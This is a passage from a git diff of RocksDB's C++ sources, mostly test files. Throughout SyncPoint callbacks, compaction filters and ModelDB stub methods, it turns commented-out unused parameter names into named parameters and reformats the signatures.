CreateTablePropertiesCollector( - TablePropertiesCollectorFactory::Context /*context*/) override { + TablePropertiesCollectorFactory::Context context) override { return new CountingDeleteTabPropCollector(); } const char* Name() const override { diff --git a/db/db_sst_test.cc b/db/db_sst_test.cc index 9427e0b5c98..73c6fe8016d 100644 --- a/db/db_sst_test.cc +++ b/db/db_sst_test.cc @@ -231,12 +231,11 @@ TEST_F(DBSSTTest, DBWithSstFileManager) { int files_deleted = 0; int files_moved = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( - "SstFileManagerImpl::OnAddFile", [&](void* /*arg*/) { files_added++; }); + "SstFileManagerImpl::OnAddFile", [&](void* arg) { files_added++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "SstFileManagerImpl::OnDeleteFile", - [&](void* /*arg*/) { files_deleted++; }); + "SstFileManagerImpl::OnDeleteFile", [&](void* arg) { files_deleted++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "SstFileManagerImpl::OnMoveFile", [&](void* /*arg*/) { files_moved++; }); + "SstFileManagerImpl::OnMoveFile", [&](void* arg) { files_moved++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); Options options = CurrentOptions(); @@ -386,7 +385,7 @@ TEST_F(DBSSTTest, DeleteSchedulerMultipleDBPaths) { int bg_delete_file = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DeleteScheduler::DeleteTrashFile:DeleteFile", - [&](void* /*arg*/) { bg_delete_file++; }); + [&](void* arg) { bg_delete_file++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); Options options = CurrentOptions(); @@ -454,7 +453,7 @@ TEST_F(DBSSTTest, DestroyDBWithRateLimitedDelete) { int bg_delete_file = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DeleteScheduler::DeleteTrashFile:DeleteFile", - [&](void* /*arg*/) { bg_delete_file++; }); + [&](void* arg) { bg_delete_file++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); Status s; @@ -547,7 +546,7 @@ TEST_F(DBSSTTest, DBWithMaxSpaceAllowedRandomized) { rocksdb::SyncPoint::GetInstance()->SetCallBack( "CompactionJob::FinishCompactionOutputFile:MaxAllowedSpaceReached", - [&](void* /*arg*/) { + [&](void* arg) { bg_error_set = true; GetAllSSTFiles(&total_sst_files_size); reached_max_space_on_compaction++; diff --git a/db/db_tailing_iter_test.cc b/db/db_tailing_iter_test.cc index 8301d5a92d4..d217828db9d 100644 --- a/db/db_tailing_iter_test.cc +++ b/db/db_tailing_iter_test.cc @@ -157,10 +157,10 @@ TEST_F(DBTestTailingIterator, TailingIteratorTrimSeekToNext) { }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "ForwardIterator::RenewIterators:Null", - [&](void* /*arg*/) { file_iters_renewed_null = true; }); + [&](void* arg) { file_iters_renewed_null = true; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "ForwardIterator::RenewIterators:Copy", - [&](void* /*arg*/) { file_iters_renewed_copy = true; }); + [&](void* arg) { file_iters_renewed_copy = true; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); const int num_records = 1000; for (int i = 1; i < num_records; ++i) { @@ -415,7 +415,7 @@ TEST_F(DBTestTailingIterator, TailingIteratorUpperBound) { int immutable_seeks = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "ForwardIterator::SeekInternal:Immutable", - [&](void* /*arg*/) { ++immutable_seeks; }); + [&](void* arg) { ++immutable_seeks; }); // Seek to 13. This should not require any immutable seeks. rocksdb::SyncPoint::GetInstance()->EnableProcessing(); diff --git a/db/db_test.cc b/db/db_test.cc index 16d6580bbd3..e9840faa042 100644 --- a/db/db_test.cc +++ b/db/db_test.cc @@ -231,11 +231,11 @@ TEST_F(DBTest, SkipDelay) { std::atomic sleep_count(0); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::DelayWrite:Sleep", - [&](void* /*arg*/) { sleep_count.fetch_add(1); }); + [&](void* arg) { sleep_count.fetch_add(1); }); std::atomic wait_count(0); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::DelayWrite:Wait", - [&](void* /*arg*/) { wait_count.fetch_add(1); }); + [&](void* arg) { wait_count.fetch_add(1); }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); WriteOptions wo; @@ -715,9 +715,9 @@ TEST_F(DBTest, FlushSchedule) { namespace { class KeepFilter : public CompactionFilter { public: - virtual bool Filter(int /*level*/, const Slice& /*key*/, - const Slice& /*value*/, std::string* /*new_value*/, - bool* /*value_changed*/) const override { + virtual bool Filter(int level, const Slice& key, const Slice& value, + std::string* new_value, + bool* value_changed) const override { return false; } @@ -747,9 +747,9 @@ class KeepFilterFactory : public CompactionFilterFactory { class DelayFilter : public CompactionFilter { public: explicit DelayFilter(DBTestBase* d) : db_test(d) {} - virtual bool Filter(int /*level*/, const Slice& /*key*/, - const Slice& /*value*/, std::string* /*new_value*/, - bool* /*value_changed*/) const override { + virtual bool Filter(int level, const Slice& key, const Slice& value, + std::string* new_value, + bool* value_changed) const override { db_test->env_->addon_time_.fetch_add(1000); return true; } @@ -764,7 +764,7 @@ class DelayFilterFactory : public CompactionFilterFactory { public: explicit DelayFilterFactory(DBTestBase* d) : db_test(d) {} virtual std::unique_ptr CreateCompactionFilter( - const CompactionFilter::Context& /*context*/) override { + const CompactionFilter::Context& context) override { return std::unique_ptr(new DelayFilter(db_test)); } @@ -2210,17 +2210,17 @@ class ModelDB : public DB { return Write(o, &batch); } using DB::Get; - virtual Status Get(const ReadOptions& /*options*/, ColumnFamilyHandle* /*cf*/, - const Slice& key, PinnableSlice* /*value*/) override { + virtual Status Get(const ReadOptions& options, ColumnFamilyHandle* cf, + const Slice& key, PinnableSlice* value) override { return Status::NotSupported(key); } using DB::MultiGet; virtual std::vector MultiGet( - const ReadOptions& /*options*/, - const std::vector& /*column_family*/, + const ReadOptions& options, + const std::vector& column_family, const std::vector& keys, - std::vector* /*values*/) override { + std::vector* values) override { std::vector s(keys.size(), Status::NotSupported("Not implemented.")); return s; @@ -2229,30 +2229,30 @@ class ModelDB : public DB { #ifndef ROCKSDB_LITE using DB::IngestExternalFile; virtual Status IngestExternalFile( - ColumnFamilyHandle* /*column_family*/, - const std::vector& /*external_files*/, - const IngestExternalFileOptions& /*options*/) override { + ColumnFamilyHandle* column_family, + const std::vector& external_files, + const IngestExternalFileOptions& options) override { return Status::NotSupported("Not implemented."); } using DB::GetPropertiesOfAllTables; virtual Status GetPropertiesOfAllTables( - ColumnFamilyHandle* /*column_family*/, - TablePropertiesCollection* /*props*/) override { + ColumnFamilyHandle* column_family, + TablePropertiesCollection* props) override { return Status(); } virtual Status GetPropertiesOfTablesInRange( - ColumnFamilyHandle* /*column_family*/, const Range* /*range*/, - std::size_t /*n*/, TablePropertiesCollection* /*props*/) override { + ColumnFamilyHandle* column_family, const Range* range, std::size_t n, + TablePropertiesCollection* props) override { return Status(); } #endif // ROCKSDB_LITE using DB::KeyMayExist; - virtual bool KeyMayExist(const ReadOptions& /*options*/, - ColumnFamilyHandle* /*column_family*/, - const Slice& /*key*/, std::string* /*value*/, + virtual bool KeyMayExist(const ReadOptions& options, + ColumnFamilyHandle* column_family, const Slice& key, + std::string* value, bool* value_found = nullptr) override { if (value_found != nullptr) { *value_found = false; @@ -2260,9 +2260,8 @@ class ModelDB : public DB { return true; // Not Supported directly } using DB::NewIterator; - virtual Iterator* NewIterator( - const ReadOptions& options, - ColumnFamilyHandle* /*column_family*/) override { + virtual Iterator* NewIterator(const ReadOptions& options, + ColumnFamilyHandle* column_family) override { if (options.snapshot == nullptr) { KVMap* saved = new KVMap; *saved = map_; @@ -2274,9 +2273,9 @@ class ModelDB : public DB { } } virtual Status NewIterators( - const ReadOptions& /*options*/, - const std::vector& /*column_family*/, - std::vector* /*iterators*/) override { + const ReadOptions& options, + const std::vector& column_family, + std::vector* iterators) override { return Status::NotSupported("Not supported yet"); } virtual const Snapshot* GetSnapshot() override { @@ -2289,7 +2288,7 @@ class ModelDB : public DB { delete reinterpret_cast(snapshot); } - virtual Status Write(const WriteOptions& /*options*/, + virtual Status Write(const WriteOptions& options, WriteBatch* batch) override { class Handler : public WriteBatch::Handler { public: @@ -2297,8 +2296,7 @@ class ModelDB : public DB { virtual void Put(const Slice& key, const Slice& value) override { (*map_)[key.ToString()] = value.ToString(); } - virtual void Merge(const Slice& /*key*/, - const Slice& /*value*/) override { + virtual void Merge(const Slice& key, const Slice& value) override { // ignore merge for now // (*map_)[key.ToString()] = value.ToString(); } @@ -2312,65 +2310,62 @@ class ModelDB : public DB { } using DB::GetProperty; - virtual bool GetProperty(ColumnFamilyHandle* /*column_family*/, - const Slice& /*property*/, - std::string* /*value*/) override { + virtual bool GetProperty(ColumnFamilyHandle* column_family, + const Slice& property, std::string* value) override { return false; } using DB::GetIntProperty; - virtual bool GetIntProperty(ColumnFamilyHandle* /*column_family*/, - const Slice& /*property*/, - uint64_t* /*value*/) override { + virtual bool GetIntProperty(ColumnFamilyHandle* column_family, + const Slice& property, uint64_t* value) override { return false; } using DB::GetMapProperty; - virtual bool GetMapProperty( - ColumnFamilyHandle* /*column_family*/, const Slice& /*property*/, - std::map* /*value*/) override { + virtual bool GetMapProperty(ColumnFamilyHandle* column_family, + const Slice& property, + std::map* value) override { return false; } using DB::GetAggregatedIntProperty; - virtual bool GetAggregatedIntProperty(const Slice& /*property*/, - uint64_t* /*value*/) override { + virtual bool GetAggregatedIntProperty(const Slice& property, + uint64_t* value) override { return false; } using DB::GetApproximateSizes; - virtual void GetApproximateSizes(ColumnFamilyHandle* /*column_family*/, - const Range* /*range*/, int n, - uint64_t* sizes, - uint8_t /*include_flags*/ + virtual void GetApproximateSizes(ColumnFamilyHandle* column_family, + const Range* range, int n, uint64_t* sizes, + uint8_t include_flags = INCLUDE_FILES) override { for (int i = 0; i < n; i++) { sizes[i] = 0; } } using DB::GetApproximateMemTableStats; - virtual void GetApproximateMemTableStats( - ColumnFamilyHandle* /*column_family*/, const Range& /*range*/, - uint64_t* const count, uint64_t* const size) override { + virtual void GetApproximateMemTableStats(ColumnFamilyHandle* column_family, + const Range& range, + uint64_t* const count, + uint64_t* const size) override { *count = 0; *size = 0; } using DB::CompactRange; - virtual Status CompactRange(const CompactRangeOptions& /*options*/, - ColumnFamilyHandle* /*column_family*/, - const Slice* /*start*/, - const Slice* /*end*/) override { + virtual Status CompactRange(const CompactRangeOptions& options, + ColumnFamilyHandle* column_family, + const Slice* start, const Slice* end) override { return Status::NotSupported("Not supported operation."); } virtual Status SetDBOptions( - const std::unordered_map& /*new_options*/) + const std::unordered_map& new_options) override { return Status::NotSupported("Not supported operation."); } using DB::CompactFiles; - virtual Status CompactFiles( - const CompactionOptions& /*compact_options*/, - ColumnFamilyHandle* /*column_family*/, - const std::vector& /*input_file_names*/, - const int /*output_level*/, const int /*output_path_id*/ = -1) override { + virtual Status CompactFiles(const CompactionOptions& compact_options, + ColumnFamilyHandle* column_family, + const std::vector& input_file_names, + const int output_level, + const int output_path_id = -1) override { return Status::NotSupported("Not supported operation."); } @@ -2383,25 +2378,24 @@ class ModelDB : public DB { } Status EnableAutoCompaction( - const std::vector& /*column_family_handles*/) - override { + const std::vector& column_family_handles) override { return Status::NotSupported("Not supported operation."); } using DB::NumberLevels; - virtual int NumberLevels(ColumnFamilyHandle* /*column_family*/) override { + virtual int NumberLevels(ColumnFamilyHandle* column_family) override { return 1; } using DB::MaxMemCompactionLevel; virtual int MaxMemCompactionLevel( - ColumnFamilyHandle* /*column_family*/) override { + ColumnFamilyHandle* column_family) override { return 1; } using DB::Level0StopWriteTrigger; virtual int Level0StopWriteTrigger( - ColumnFamilyHandle* /*column_family*/) override { + ColumnFamilyHandle* column_family) override { return -1; } @@ -2410,8 +2404,7 @@ class ModelDB : public DB { virtual Env* GetEnv() const override { return nullptr; } using DB::GetOptions; - virtual Options GetOptions( - ColumnFamilyHandle* /*column_family*/) const override { + virtual Options GetOptions(ColumnFamilyHandle* column_family) const override { return options_; } @@ -2419,8 +2412,8 @@ class ModelDB : public DB { virtual DBOptions GetDBOptions() const override { return options_; } using DB::Flush; - virtual Status Flush(const rocksdb::FlushOptions& /*options*/, - ColumnFamilyHandle* /*column_family*/) override { + virtual Status Flush(const rocksdb::FlushOptions& options, + ColumnFamilyHandle* column_family) override { Status ret; return ret; } @@ -2430,35 +2423,33 @@ class ModelDB : public DB { #ifndef ROCKSDB_LITE virtual Status DisableFileDeletions() override { return Status::OK(); } - virtual Status EnableFileDeletions(bool /*force*/) override { + virtual Status EnableFileDeletions(bool force) override { return Status::OK(); } - virtual Status GetLiveFiles(std::vector&, uint64_t* /*size*/, - bool /*flush_memtable*/ = true) override { + virtual Status GetLiveFiles(std::vector&, uint64_t* size, + bool flush_memtable = true) override { return Status::OK(); } - virtual Status GetSortedWalFiles(VectorLogPtr& /*files*/) override { + virtual Status GetSortedWalFiles(VectorLogPtr& files) override { return Status::OK(); } - virtual Status DeleteFile(std::string /*name*/) override { - return Status::OK(); - } + virtual Status DeleteFile(std::string name) override { return Status::OK(); } virtual Status GetUpdatesSince( rocksdb::SequenceNumber, unique_ptr*, - const TransactionLogIterator::ReadOptions& /*read_options*/ = + const TransactionLogIterator::ReadOptions& read_options = TransactionLogIterator::ReadOptions()) override { return Status::NotSupported("Not supported in Model DB"); } virtual void GetColumnFamilyMetaData( - ColumnFamilyHandle* /*column_family*/, - ColumnFamilyMetaData* /*metadata*/) override {} + ColumnFamilyHandle* column_family, + ColumnFamilyMetaData* metadata) override {} #endif // ROCKSDB_LITE - virtual Status GetDbIdentity(std::string& /*identity*/) const override { + virtual Status GetDbIdentity(std::string& identity) const override { return Status::OK(); } @@ -3331,7 +3322,7 @@ TEST_F(DBTest, DynamicMemtableOptions) { rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::DelayWrite:Wait", - [&](void* /*arg*/) { sleeping_task_low.WakeUp(); }); + [&](void* arg) { sleeping_task_low.WakeUp(); }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); while (!sleeping_task_low.WokenUp() && count < 256) { @@ -4539,7 +4530,7 @@ class DelayedMergeOperator : public MergeOperator { public: explicit DelayedMergeOperator(DBTest* d) : db_test_(d) {} - virtual bool FullMergeV2(const MergeOperationInput& /*merge_in*/, + virtual bool FullMergeV2(const MergeOperationInput& merge_in, MergeOperationOutput* merge_out) const override { db_test_->env_->addon_time_.fetch_add(1000); merge_out->new_value = ""; @@ -4890,7 +4881,7 @@ TEST_F(DBTest, AutomaticConflictsWithManualCompaction) { std::atomic callback_count(0); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction()::Conflict", - [&](void* /*arg*/) { callback_count.fetch_add(1); }); + [&](void* arg) { callback_count.fetch_add(1); }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); CompactRangeOptions croptions; croptions.exclusive_manual_compaction = false; @@ -5089,7 +5080,7 @@ TEST_F(DBTest, HardLimit) { std::atomic callback_count(0); rocksdb::SyncPoint::GetInstance()->SetCallBack("DBImpl::DelayWrite:Wait", - [&](void* /*arg*/) { + [&](void* arg) { callback_count.fetch_add(1); sleeping_task_low.WakeUp(); }); @@ -5182,7 +5173,7 @@ TEST_F(DBTest, SoftLimit) { // Only allow one compactin going through. rocksdb::SyncPoint::GetInstance()->SetCallBack( - "BackgroundCallCompaction:0", [&](void* /*arg*/) { + "BackgroundCallCompaction:0", [&](void* arg) { // Schedule a sleeping task. sleeping_task_low.Reset(); env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, diff --git a/db/db_test2.cc b/db/db_test2.cc index 32f2896cd08..aa10789c851 100644 --- a/db/db_test2.cc +++ b/db/db_test2.cc @@ -497,9 +497,9 @@ TEST_F(DBTest2, WalFilterTest) { apply_option_at_record_index_(apply_option_for_record_index), current_record_index_(0) {} - virtual WalProcessingOption LogRecord( - const WriteBatch& /*batch*/, WriteBatch* /*new_batch*/, - bool* /*batch_changed*/) const override { + virtual WalProcessingOption LogRecord(const WriteBatch& batch, + WriteBatch* new_batch, + bool* batch_changed) const override { WalFilter::WalProcessingOption option_to_return; if (current_record_index_ == apply_option_at_record_index_) { @@ -873,10 +873,11 @@ TEST_F(DBTest2, WalFilterTestWithColumnFamilies) { cf_name_id_map_ = cf_name_id_map; } - virtual WalProcessingOption LogRecordFound( - unsigned long long log_number, const std::string& /*log_file_name*/, - const WriteBatch& batch, WriteBatch* /*new_batch*/, - bool* /*batch_changed*/) override { + virtual WalProcessingOption LogRecordFound(unsigned long long log_number, + const std::string& log_file_name, + const WriteBatch& batch, + WriteBatch* new_batch, + bool* batch_changed) override { class LogRecordBatchHandler : public WriteBatch::Handler { private: const std::map & cf_log_number_map_; @@ -1211,7 +1212,7 @@ class CompactionStallTestListener : public EventListener { public: CompactionStallTestListener() : compacted_files_cnt_(0) {} - void OnCompactionCompleted(DB* /*db*/, const CompactionJobInfo& ci) override { + void OnCompactionCompleted(DB* db, const CompactionJobInfo& ci) override { ASSERT_EQ(ci.cf_name, "default"); ASSERT_EQ(ci.base_input_level, 0); ASSERT_EQ(ci.compaction_reason, CompactionReason::kLevelL0FilesNum); @@ -1672,7 +1673,7 @@ TEST_F(DBTest2, SyncPointMarker) { std::atomic sync_point_called(0); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBTest2::MarkedPoint", - [&](void* /*arg*/) { sync_point_called.fetch_add(1); }); + [&](void* arg) { sync_point_called.fetch_add(1); }); // The first dependency enforces Marker can be loaded before MarkedPoint. // The second checks that thread 1's MarkedPoint should be disabled here. @@ -1941,7 +1942,7 @@ TEST_F(DBTest2, AutomaticCompactionOverlapManualCompaction) { // can fit in L2, these 2 files will be moved to L2 and overlap with // the running compaction and break the LSM consistency. rocksdb::SyncPoint::GetInstance()->SetCallBack( - "CompactionJob::Run():Start", [&](void* /*arg*/) { + "CompactionJob::Run():Start", [&](void* arg) { ASSERT_OK( dbfull()->SetOptions({{"level0_file_num_compaction_trigger", "2"}, {"max_bytes_for_level_base", "1"}})); @@ -2007,7 +2008,7 @@ TEST_F(DBTest2, ManualCompactionOverlapManualCompaction) { // the running compaction and break the LSM consistency. std::atomic flag(false); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "CompactionJob::Run():Start", [&](void* /*arg*/) { + "CompactionJob::Run():Start", [&](void* arg) { if (flag.exchange(true)) { // We want to make sure to call this callback only once return; diff --git a/db/db_test_util.cc b/db/db_test_util.cc index 966fec2cf97..5ca4b19a253 100644 --- a/db/db_test_util.cc +++ b/db/db_test_util.cc @@ -1127,18 +1127,17 @@ UpdateStatus DBTestBase::updateInPlaceSmallerVarintSize(char* prevValue, } } -UpdateStatus DBTestBase::updateInPlaceLargerSize(char* /*prevValue*/, - uint32_t* /*prevSize*/, +UpdateStatus DBTestBase::updateInPlaceLargerSize(char* prevValue, + uint32_t* prevSize, Slice delta, std::string* newValue) { *newValue = std::string(delta.size(), 'c'); return UpdateStatus::UPDATED; } -UpdateStatus DBTestBase::updateInPlaceNoAction(char* /*prevValue*/, - uint32_t* /*prevSize*/, - Slice /*delta*/, - std::string* /*newValue*/) { +UpdateStatus DBTestBase::updateInPlaceNoAction(char* prevValue, + uint32_t* prevSize, Slice delta, + std::string* newValue) { return UpdateStatus::UPDATE_FAILED; } diff --git a/db/db_test_util.h b/db/db_test_util.h index 70cc6fd70a8..cd1265e21f1 100644 --- a/db/db_test_util.h +++ b/db/db_test_util.h @@ -187,7 +187,7 @@ class SpecialSkipListFactory : public MemTableRepFactory { using MemTableRepFactory::CreateMemTableRep; virtual MemTableRep* CreateMemTableRep( const MemTableRep::KeyComparator& compare, Allocator* allocator, - const SliceTransform* transform, Logger* /*logger*/) override { + const SliceTransform* transform, Logger* logger) override { return new SpecialMemTableRep( allocator, factory_.CreateMemTableRep(compare, allocator, transform, 0), num_entries_flush_); diff --git a/db/db_universal_compaction_test.cc b/db/db_universal_compaction_test.cc index c88bc30c1c9..c6334f8e067 100644 --- a/db/db_universal_compaction_test.cc +++ b/db/db_universal_compaction_test.cc @@ -56,9 +56,9 @@ void VerifyCompactionResult( class KeepFilter : public CompactionFilter { public: - virtual bool Filter(int /*level*/, const Slice& /*key*/, - const Slice& /*value*/, std::string* /*new_value*/, - bool* /*value_changed*/) const override { + virtual bool Filter(int level, const Slice& key, const Slice& value, + std::string* new_value, bool* value_changed) const + override { return false; } @@ -88,9 +88,9 @@ class KeepFilterFactory : public CompactionFilterFactory { class DelayFilter : public CompactionFilter { public: explicit DelayFilter(DBTestBase* d) : db_test(d) {} - virtual bool Filter(int /*level*/, const Slice& /*key*/, - const Slice& /*value*/, std::string* /*new_value*/, - bool* /*value_changed*/) const override { + virtual bool Filter(int level, const Slice& key, const Slice& value, + std::string* new_value, + bool* value_changed) const override { db_test->env_->addon_time_.fetch_add(1000); return true; } @@ -105,7 +105,7 @@ class DelayFilterFactory : public CompactionFilterFactory { public: explicit DelayFilterFactory(DBTestBase* d) : db_test(d) {} virtual std::unique_ptr CreateCompactionFilter( - const CompactionFilter::Context& /*context*/) override { + const CompactionFilter::Context& context) override { return std::unique_ptr(new DelayFilter(db_test)); } @@ -522,7 +522,7 @@ TEST_P(DBTestUniversalCompactionMultiLevels, UniversalCompactionTrivialMove) { int32_t non_trivial_move = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* /*arg*/) { trivial_move++; }); + [&](void* arg) { trivial_move++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", [&](void* arg) { non_trivial_move++; @@ -593,23 +593,23 @@ TEST_P(DBTestUniversalCompactionParallel, UniversalCompactionParallel) { // Delay every compaction so multiple compactions will happen. std::atomic num_compactions_running(0); std::atomic has_parallel(false); - rocksdb::SyncPoint::GetInstance()->SetCallBack( - "CompactionJob::Run():Start", [&](void* /*arg*/) { - if (num_compactions_running.fetch_add(1) > 0) { - has_parallel.store(true); - return; - } - for (int nwait = 0; nwait < 20000; nwait++) { - if (has_parallel.load() || num_compactions_running.load() > 1) { - has_parallel.store(true); - break; - } - env_->SleepForMicroseconds(1000); - } - }); + rocksdb::SyncPoint::GetInstance()->SetCallBack("CompactionJob::Run():Start", + [&](void* arg) { + if (num_compactions_running.fetch_add(1) > 0) { + has_parallel.store(true); + return; + } + for (int nwait = 0; nwait < 20000; nwait++) { + if (has_parallel.load() || num_compactions_running.load() > 1) { + has_parallel.store(true); + break; + } + env_->SleepForMicroseconds(1000); + } + }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "CompactionJob::Run():End", - [&](void* /*arg*/) { num_compactions_running.fetch_add(-1); }); + [&](void* arg) { num_compactions_running.fetch_add(-1); }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); options = CurrentOptions(options); @@ -984,7 +984,7 @@ TEST_P(DBTestUniversalCompaction, UniversalCompactionTrivialMoveTest1) { int32_t non_trivial_move = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* /*arg*/) { trivial_move++; }); + [&](void* arg) { trivial_move++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", [&](void* arg) { non_trivial_move++; @@ -1030,7 +1030,7 @@ TEST_P(DBTestUniversalCompaction, UniversalCompactionTrivialMoveTest2) { int32_t trivial_move = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* /*arg*/) { trivial_move++; }); + [&](void* arg) { trivial_move++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", [&](void* arg) { ASSERT_TRUE(arg != nullptr); diff --git a/db/deletefile_test.cc b/db/deletefile_test.cc index 7a480fc4655..989c0c4118b 100644 --- a/db/deletefile_test.cc +++ b/db/deletefile_test.cc @@ -159,7 +159,7 @@ class DeleteFileTest : public testing::Test { } // An empty job to guard all jobs are processed - static void GuardFinish(void* /*arg*/) { + static void GuardFinish(void* arg) { TEST_SYNC_POINT("DeleteFileTest::GuardFinish"); } }; diff --git a/db/external_sst_file_test.cc b/db/external_sst_file_test.cc index 0187265b6bb..4a4e82e792d 100644 --- a/db/external_sst_file_test.cc +++ b/db/external_sst_file_test.cc @@ -395,9 +395,8 @@ class SstFileWriterCollector : public TablePropertiesCollector { return Status::OK(); } - Status AddUserKey(const Slice& /*user_key*/, const Slice& /*value*/, - EntryType /*type*/, SequenceNumber /*seq*/, - uint64_t /*file_size*/) override { + Status AddUserKey(const Slice& user_key, const Slice& value, EntryType type, + SequenceNumber seq, uint64_t file_size) override { ++count_; return Status::OK(); } @@ -417,7 +416,7 @@ class SstFileWriterCollectorFactory : public TablePropertiesCollectorFactory { explicit SstFileWriterCollectorFactory(std::string prefix) : prefix_(prefix), num_created_(0) {} virtual TablePropertiesCollector* CreateTablePropertiesCollector( - TablePropertiesCollectorFactory::Context /*context*/) override { + TablePropertiesCollectorFactory::Context context) override { num_created_++; return new SstFileWriterCollector(prefix_); } @@ -688,7 +687,7 @@ TEST_F(ExternalSSTFileTest, PurgeObsoleteFilesBug) { DestroyAndReopen(options); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::AddFile:FileCopied", [&](void* /*arg*/) { + "DBImpl::AddFile:FileCopied", [&](void* arg) { ASSERT_OK(Put("aaa", "bbb")); ASSERT_OK(Flush()); ASSERT_OK(Put("aaa", "xxx")); @@ -1127,7 +1126,7 @@ TEST_F(ExternalSSTFileTest, PickedLevelBug) { std::atomic bg_compact_started(false); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:Start", - [&](void* /*arg*/) { bg_compact_started.store(true); }); + [&](void* arg) { bg_compact_started.store(true); }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); @@ -1408,7 +1407,7 @@ TEST_F(ExternalSSTFileTest, AddFileTrivialMoveBug) { ASSERT_OK(GenerateAndAddExternalFile(options, {22, 23}, 6)); // L2 rocksdb::SyncPoint::GetInstance()->SetCallBack( - "CompactionJob::Run():Start", [&](void* /*arg*/) { + "CompactionJob::Run():Start", [&](void* arg) { // fit in L3 but will overlap with compaction so will be added // to L2 but a compaction will trivially move it to L3 // and break LSM consistency @@ -1798,7 +1797,7 @@ TEST_F(ExternalSSTFileTest, FileWithCFInfo) { class TestIngestExternalFileListener : public EventListener { public: - void OnExternalFileIngested(DB* /*db*/, + void OnExternalFileIngested(DB* db, const ExternalFileIngestionInfo& info) override { ingested_files.push_back(info); } diff --git a/db/fault_injection_test.cc b/db/fault_injection_test.cc index 81ffae925a9..adfcb4db5a7 100644 --- a/db/fault_injection_test.cc +++ b/db/fault_injection_test.cc @@ -463,10 +463,10 @@ TEST_P(FaultInjectionTest, UninstalledCompaction) { std::atomic opened(false); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::Open:Opened", [&](void* /*arg*/) { opened.store(true); }); + "DBImpl::Open:Opened", [&](void* arg) { opened.store(true); }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BGWorkCompaction", - [&](void* /*arg*/) { ASSERT_TRUE(opened.load()); }); + [&](void* arg) { ASSERT_TRUE(opened.load()); }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); ASSERT_OK(OpenDB()); ASSERT_OK(Verify(0, kNumKeys, FaultInjectionTest::kValExpectFound)); diff --git a/db/file_indexer_test.cc b/db/file_indexer_test.cc index b424f91eacc..5cd8c2d2cf6 100644 --- a/db/file_indexer_test.cc +++ b/db/file_indexer_test.cc @@ -36,10 +36,10 @@ class IntComparator : public Comparator { const char* Name() const override { return "IntComparator"; } - void FindShortestSeparator(std::string* /*start*/, - const Slice& /*limit*/) const override {} + void FindShortestSeparator(std::string* start, + const Slice& limit) const override {} - void FindShortSuccessor(std::string* /*key*/) const override {} + void FindShortSuccessor(std::string* key) const override {} }; class FileIndexerTest : public testing::Test { diff --git a/db/forward_iterator.cc b/db/forward_iterator.cc index affeca01879..65fff95956d 100644 --- a/db/forward_iterator.cc +++ b/db/forward_iterator.cc @@ -104,7 +104,7 @@ class LevelIterator : public InternalIterator { file_iter_->Seek(internal_key); valid_ = file_iter_->Valid(); } - void SeekForPrev(const Slice& /*internal_key*/) override { + void SeekForPrev(const Slice& internal_key) override { status_ = Status::NotSupported("LevelIterator::SeekForPrev()"); valid_ = false; } diff --git a/db/forward_iterator.h b/db/forward_iterator.h index 8946b7b75e7..d4f32cba9fa 100644 --- a/db/forward_iterator.h +++ b/db/forward_iterator.h @@ -55,7 +55,7 @@ class ForwardIterator : public InternalIterator { ColumnFamilyData* cfd, SuperVersion* current_sv = nullptr); virtual ~ForwardIterator(); - void SeekForPrev(const Slice& /*target*/) override { + void SeekForPrev(const Slice& target) override { status_ = Status::NotSupported("ForwardIterator::SeekForPrev()"); valid_ = false; } diff --git a/db/internal_stats.cc b/db/internal_stats.cc index 70bd9523fa6..54723ea91f6 100644 --- a/db/internal_stats.cc +++ b/db/internal_stats.cc @@ -435,7 +435,7 @@ bool InternalStats::GetStringProperty(const DBPropertyInfo& property_info, } bool InternalStats::GetMapProperty(const DBPropertyInfo& property_info, - const Slice& /*property*/, + const Slice& property, std::map* value) { assert(value != nullptr); assert(property_info.handle_map != nullptr); @@ -487,7 +487,7 @@ bool InternalStats::HandleCompressionRatioAtLevelPrefix(std::string* value, return true; } -bool InternalStats::HandleLevelStats(std::string* value, Slice /*suffix*/) { +bool InternalStats::HandleLevelStats(std::string* value, Slice suffix) { char buf[1000]; const auto* vstorage = cfd_->current()->storage_info(); snprintf(buf, sizeof(buf), @@ -519,36 +519,35 @@ bool 